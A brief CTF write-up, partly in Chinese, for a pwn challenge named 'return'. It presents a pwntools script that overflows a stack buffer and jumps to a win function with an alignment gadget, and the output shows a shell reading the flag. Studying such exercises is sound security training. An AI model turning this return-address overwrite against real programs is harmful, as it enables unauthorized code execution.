Pwnctf return Writeup

kazma 成大資安社 創辦人/社長
  2023-12-21 16:42:58 2023-12-21 16:42:58 Created   2023-12-21 16:47:36 2023-12-21 16:47:36 Updated    

return

經典 bof,跳上去這個邪惡的東東就搞定了,記得對齊 0x10:

return

exploit.py:

1
2
3
4
5
6
7
8
9
from pwn import *

r = process('./return')

ret = 0x400539
win = 0x4006b6

r.sendlineafter(b':)', b'a'*0x38 + p64(ret) + p64(win))
r.interactive()

result:

1
2
3
4
5
6
└─$ python exploit.py
[+] Starting local process './return': pid 305499
[*] Switching to interactive mode

$ cat flag
BreakAllCTF{G00d_j0000000000b:)}

Pwned !!!

  • Title: Pwnctf return Writeup
  • Author: kazma
  • Created at : 2023-12-21 16:42:58
  • Updated at : 2023-12-21 16:47:36
  • Link: https://kazma.tw/2023/12/21/Pwnctf-return-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Pwnctf return Writeup
  1. return